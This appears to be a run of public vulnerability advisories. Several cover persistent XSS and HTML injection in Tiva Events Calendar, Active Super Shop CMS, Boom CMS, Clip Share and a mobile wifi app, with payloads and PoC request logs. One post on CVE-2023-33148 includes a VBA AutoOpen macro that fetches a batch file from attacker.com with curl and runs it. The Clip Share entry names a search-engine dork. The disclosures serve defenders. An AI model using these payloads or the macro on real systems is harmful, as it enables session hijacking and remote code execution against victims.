http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)> PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml - http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)> PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: treeview=0 Upgrade-Insecure-Requests: 1 GET: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html - http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)> PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Security Risk: ============== The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>Document Title: =============== Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2276 Release Date: ============= 2023-07-05 Vulnerability Laboratory ID (VL-ID): ==================================== 2276 Common Vulnerability Scoring System: ==================================== 5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects, such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of service businesses to get online reservations without any hassles. (Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent script code inject vulnerability in the Tiva Events Calender v1.4 web-application. Affected Product(s): ==================== tiva_theme Product: Tiva Events Calender - Calender PHP (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-04-03: Researcher Notification & Coordination (Security Researcher) 2021-04-04: Vendor Notification 1 (Security Department) 2021-06-24: Vendor Notification 2 (Security Department) 2021-07-13: Vendor Notification 3 (Security Department) ****-**-**: Vendor Response/Feedback (Security Department) ****-**-**: Vendor Fix/Patch (Service Developer Team) ****-**-**: Security Acknowledgements (Security Department) 2023-07-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the name input field and name parameter. Remote attackers privileged user accounts are able to inject own malicious script codes as name. Thus results in a persistent execute of the script code in the backend on edit but as well in the frontend (index) were the event is being displayed after the submit (save) via post method request. In the same direction it is possible to inject malformed client-side executable script code in get request to trigger a non-persistent execution. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected frontend / backend application modules. Request Method(s): [+] POST / GET Vulnerable Input(s): [+] Name Vulnerable Parameter(s): [+] name Affected Module(s): [+] index.php (Frontend on Event Preview) [+] edit.php (Backend on Edit ID) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Exploitation: Payload %20"<img src="evil.source" onload=alert(document.domain)> Vulnerable Source: Frontend (Index) <tr><td class="calendar-day-normal">8</td> <td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)"> event1"%20"<img src="evil.source" onload=alert(document.domain)></div></div></td><td class="calendar-day-normal">10</td> <td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td> <td class="calendar-day-normal">14</td></tr> Vulnerable Source: Backend (Edit ID) <section class="panel"> <header class="panel-heading"> Edit File</header> <div class="panel-body"> <div class="alert alert-success"> <button data-dismiss="alert" class="close close-sm" type="button"> </button>Report successfully saved.</div> <form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data"> <div class="form-group"> <label class="col-lg-2 col-sm-2 control-label">Name&nbsp;*</label> <div class="col-sm-8"> <input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required /> </div></div> --- PoC Session Logs (POST) --- https://tiva-cal.localhost:8080/admin/report/edit.php Host: tiva-cal.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683 Content-Length: 745 Origin:https://tiva-cal.localhost:8080 Connection: keep-alive Referer:https://tiva-cal.localhost:8080/admin/report/edit.php Cookie: PHPSESSID=76gqk14e1s6cce40hfj11 name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save= - POST: HTTP/2.0 200 OK server: nginx content-type: text/html content-length: 1283 etag: "503-53ed12f4ca761" accept-ranges: bytes strict-transport-security: max-age=15768000; includeSubDomains - https://tiva-cal.localhost:8080/admin/report/evil.source Host: tiva-cal.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: image/webp,*/* Connection: keep-alive Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222 Cookie: PHPSESSID=76gqk14e1s6cce40hfj11 - GET: HTTP/2.0 200 OK server: nginx content-type: text/html content-length: 1283 etag: "503-53ed12f4ca761" accept-ranges: bytes strict-transport-security: max-age=15768000; includeSubDomains Solution - Fix & Patch: ======================= The vulnerability can be patched by the following steps ... 1. Encode and escape the name input field content on transmit via post method 2. Restrict the input field and disallow insert of special chars 3. Parse the output location on the index frontend via encode to sanitize and prevent the execute 4. Parse the output location on the edit id report backend via encode to sanitize and prevent the execute Security Risk: ============== The security risk of the persistent input validation vulnerability in the web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>Document Title: =============== Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2278 Release Date: ============= 2023-07-04 Vulnerability Laboratory ID (VL-ID): ==================================== 2278 Common Vulnerability Scoring System: ==================================== 5.4 Vulnerability Class: ==================== Script Code Injection Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432 Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application. Affected Product(s): ==================== ActiveITzone Product: Active Super Shop CMS v2.5 (CMS) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-20: Researcher Notification & Coordination (Security Researcher) 2021-08-21: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2023-07-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application. The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content. The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module. Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Manage Details Vulnerable Parameter(s): [+] name [+] phone [+] address Affected Module(s): [+] manage profile [+] products branding Proof of Concept (PoC): ======================= The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Exploitation: Payload <img src="https://[DOMAIN]/[PATH]/[PICTURE].*"> Vulnerable Source: manage_admin & branding <div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;"> <div class="panel-heading"> <h3 class="panel-title">Manage Details</h3> </div> <form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8"> <div class="panel-body"> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-1">Name</label> <div class="col-sm-6"> <input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-2">Email</label> <div class="col-sm-6"> <input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-3"> Phone</label> <div class="col-sm-6"> <input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control"> </div></div> --- PoC Session Logs (POST) --- https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680 Content-Length: 902 Origin:https://assm_cms.localhost:8080 Connection: keep-alive Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/ Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1 - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly https://assm_cms.localhost:8080/shop/admin/manage_admin/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Reference(s): https://assm_cms.localhost:8080/shop/ https://assm_cms.localhost:8080/shop/admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Solution - Fix & Patch: ======================= Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver. Security Risk: ============== The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>Document Title: =============== Boom CMS v8.0.7 - Cross Site Scripting Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2274 Release Date: ============= 2023-07-03 Vulnerability Laboratory ID (VL-ID): ==================================== 2274 Common Vulnerability Scoring System: ==================================== 5.3 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It gives editors control but doesn't require any technical knowledge. (Copy of the Homepage:https://www.boomcms.net/boom-boom ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application. Affected Product(s): ==================== UXB London Product: Boom v8.0.7 - Content Management System (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-07-24: Researcher Notification & Coordination (Security Researcher) 2022-07-25: Vendor Notification (Security Department) 2023-**-**: Vendor Response/Feedback (Security Department) 2023-**-**: Vendor Fix/Patch (Service Developer Team) 2023-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the input fields of the album title and album description in the asset-manager module. Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description. After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets. The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse the content by usage of a backslash. Thus does not have any impact to inject own malicious java-scripts because of its only performed for double- and single-quotes to prevent sql injections. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] assets-manager (album) Vulnerable Function(s): [+] add Vulnerable Parameter(s): [+] title [+] description Affected Module(s): [+] Frontend (Albums) [+] Backend (Albums Assets) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Login to the application as restricted user 2. Create a new album 3. Inject a test script code payload to title and description 4. Save the request 5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution 6. Successful reproduce of the persistent cross site web vulnerability! Payload(s): ><script>alert(document.cookie)</script><div style=1 <a onmouseover=alert(document.cookie)>test</a> --- PoC Session Logs (Inject) --- https://localhost:8000/boomcms/album/35 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 263 Origin:https://localhost:8000 Connection: keep-alive Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Sec-Fetch-Site: same-origin {"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>", "slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by" :null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"} - PUT: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private Set-Cookie: Max-Age=7200; path=/ Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; Max-Age=7200; path=/; httponly Content-Length: 242 Connection: Keep-Alive Content-Type: application/json - https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; - GET: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private Set-Cookie: Vary: Accept-Encoding Content-Length: 7866 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - Vulnerable Source: asset-manager/albums/[ID] <li data-album="36"> <a href="#albums/20"> <div> <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3> "><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]> 0 assets </div> </a> </li> </iframe></div></a></li></ul></div></div> </div> <div id="b-assets-view-asset-container"></div> <div id="b-assets-view-selection-container"></div> <div id="b-assets-view-album-container"><div><div id="b-assets-view-album"> <div class="heading"> <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1> <[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]> </div> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters. Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege Vulnerability + RCE. ## Author: nu11secur1ty ## Date: 07.18.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office ## Reference: https://portswigger.net/web-security/access-control ## CVE-2023-33148 ## Description: The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to Elevation of Privilege. The attacker can use this vulnerability to attach a very malicious WORD file in the Outlook app which is a part of Microsoft Office 365 and easily can trick the victim to click on it - opening it and executing a very dangerous shell command, in the background of the local PC. This execution is without downloading this malicious file, and this is a potential problem and a very dangerous case! This can be the end of the victim's PC, it depends on the scenario. WARNING! Office 365 executes files directly from Outlook, without temp downloading, security checking and etc. ## Staus: HIGH Vulnerability [+]Exploit: - - - NOTE: This exploit is connected to the third-party server, and when the victim clicks on it and opens it the content of the script which is inside will fetch on the machine locally and execute himself by using MS Office 365 and Outlook app which is a part of the 365 API. ```vb Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .\salaries.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html) ## Time spend: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>==================================================================================================================================== | # Title : Clip Share 4.1.4 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : http://www.clip-share.com/ | | # Dork : Powered By ClipShare | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Xss : This vulnerability affects /ClipShare/signup. URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad=" The input is reflected inside a tag parameter between double quotes. URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad=" The input is reflected inside a tag parameter between double quotes. Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>